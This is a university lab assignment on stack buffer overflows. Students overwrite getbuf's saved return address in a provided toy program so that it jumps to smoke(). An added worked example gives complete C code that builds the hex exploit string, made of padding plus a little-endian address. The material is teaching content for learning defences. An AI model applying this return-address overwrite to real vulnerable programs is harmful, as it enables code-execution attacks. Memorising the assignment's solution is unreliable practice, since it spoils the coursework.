lab4 - CSE 361S Intro to Systems Software Lab Assignment#4...

CSE 361S Intro to Systems Software
Lab Assignment #4
Due: Thursday, October 29, 2009.

In this lab, you will mount a buffer overflow attack on your own program. We do not condone using this or any other form of attack to gain unauthorized access to a system. Rather, by doing this exercise, I hope you will learn a lot about how to defend against such attacks. You may work in a group of up to two people in solving the problems in this lab.

Download the file bufbomb.c from the class web site and compile it to create an executable program. In bufbomb.c you will find the following functions:

    int getbuf()
    {
        char buf[16];
        getxs(buf);
        return 1;
    }

    void test()
    {
        int val;
        printf("Type Hex String: ");
        val = getbuf();
        printf("getbuf returned 0x%x\n", val);
    }

The function getxs (also in bufbomb.c) is similar to the library function gets, except that it reads characters encoded as pairs of hex digits. For example, to give it the string "0123", the user would type "30 31 32 33". The function ignores blank characters. Recall that decimal digit x has ASCII representation 0x3x. A typical execution of the program is as follows:

    prompt> ./bufbomb
    Type Hex String: 30 31 32 33
    getbuf returned 0x1

Looking at the code for the getbuf function, it seems quite apparent that it will return the value 1 whenever it is called. It appears as if the call to getxs has no effect. Your task is to make getbuf return 0xdeadbeef to test, simply by typing an appropriate hexadecimal string at the prompt.
You will get there in several stages.

Stage 1

If the string typed by the user to getbuf is no more than 15 characters long, it is clear that getbuf will return 1. Typically an error occurs if we type a longer string:

    prompt> ./bufbomb
    Type Hex String: 30 31 32 33 30 31 32 33 30 31 32 33 30 31
    Ouch!: You caused a segmentation fault!
    Better luck next time

As the error indicates, overrunning the buffer typically corrupts the program state, leading to a memory access error. Your task is to be more clever with the strings you feed bufbomb so that it does more interesting things.

When getbuf executes its return statement, the program ordinarily resumes execution within function test. In the file bufbomb.c, there is a function smoke having the following C code:

    void smoke()
    {
        printf("Smoke: You called smoke()\n");
        exit(0);
    }

Your task is to get bufbomb to execute the code for smoke when getbuf executes its ret instruction, rather than returning to test. You can do this by supplying an exploit string that overwrites the saved return address in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.

Helpful hints:
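The following is an added worked example, not part of bufbomb.c or the assignment text. It shows how the hex-pair input described above is decoded (mirroring the getxs behaviour the text describes, except that this decoder bounds-checks its output), and how a Stage 1 exploit string is assembled: filler bytes up to the saved return address, then the address of smoke written in little-endian byte order, since the lab targets IA-32. The padding length (28 here) and the address of smoke (0x08048a1c here) are hypothetical placeholders; the real values must be read from your own compiled binary in gdb (for example with `disassemble getbuf` and `p smoke`), because they depend on how the compiler laid out getbuf's frame.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Map one hex digit to its value, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a string of hex-digit pairs into bytes, ignoring blanks, the way
 * the lab describes getxs() consuming its input ("30 31 32 33" -> "0123").
 * Returns the number of bytes written, or -1 on a bad digit, an odd digit
 * count, or overflow of out. (The real getxs has no such bound; that is
 * the whole point of the lab.) */
int decode_hex_pairs(const char *s, unsigned char *out, size_t outcap)
{
    size_t n = 0;
    int hi = -1;
    for (; *s != '\0'; s++) {
        if (isspace((unsigned char)*s)) continue;
        int v = hexval((unsigned char)*s);
        if (v < 0) return -1;
        if (hi < 0) { hi = v; continue; }
        if (n >= outcap) return -1;
        out[n++] = (unsigned char)((hi << 4) | v);
        hi = -1;
    }
    return hi < 0 ? (int)n : -1;
}

/* Build the Stage 1 exploit string as it would be typed at the prompt:
 * pad_len filler bytes covering buf and whatever the compiler placed
 * between buf and the saved return address, then the 4-byte target
 * address in little-endian order (IA-32 is little-endian, so the lowest
 * byte of the address must come first in the string).
 * Returns the string length, or 0 if out is too small. */
size_t build_payload(size_t pad_len, uint32_t target, char *out, size_t outcap)
{
    size_t need = (pad_len + 4) * 3 + 1;   /* "xx " per byte, plus NUL */
    if (outcap < need) return 0;
    size_t pos = 0;
    for (size_t i = 0; i < pad_len; i++)
        pos += (size_t)sprintf(out + pos, "%02x ", 0x41u);   /* 'A' filler */
    for (unsigned i = 0; i < 4; i++)
        pos += (size_t)sprintf(out + pos, "%02x ",
                               (unsigned)((target >> (8 * i)) & 0xffu));
    out[pos - 1] = '\0';   /* drop the trailing blank */
    return pos - 1;
}

/* Decode hexstr and return the 32-bit value that lands in the saved return
 * address slot (the four bytes after the padding), assembled the way the
 * CPU reads it on ret. Returns 0 if the string is malformed or the wrong
 * length for the given padding. */
uint32_t landed_return_address(const char *hexstr, size_t pad_len)
{
    unsigned char bytes[512];
    int n = decode_hex_pairs(hexstr, bytes, sizeof bytes);
    if (n < 0 || (size_t)n != pad_len + 4) return 0;
    const unsigned char *p = bytes + pad_len;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Sanity check: build, decode, and confirm the target comes back intact. */
int payload_roundtrip_ok(size_t pad_len, uint32_t target)
{
    char line[2048];
    if (build_payload(pad_len, target, line, sizeof line) == 0) return 0;
    return landed_return_address(line, pad_len) == target;
}

int main(void)
{
    /* Hypothetical values: 28 bytes from the start of buf to the saved
     * return address, and 0x08048a1c as the address of smoke(). Read the
     * real ones from your binary in gdb before typing anything. */
    char line[256];
    build_payload(28, 0x08048a1cu, line, sizeof line);
    printf("%s\n", line);
    printf("ret will jump to 0x%08x\n", landed_return_address(line, 28));
    return 0;
}
```

Paste the printed line at the "Type Hex String:" prompt. If the padding length is off by even one byte, the address straddles the wrong slot and the program will most likely segfault again, so check the frame layout in gdb rather than guessing; if the address of smoke contains a byte that getxs treats specially, that byte still has to be typed as its hex pair, which is why the lab uses hex input instead of raw characters.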

This document was uploaded on 11/13/2009.
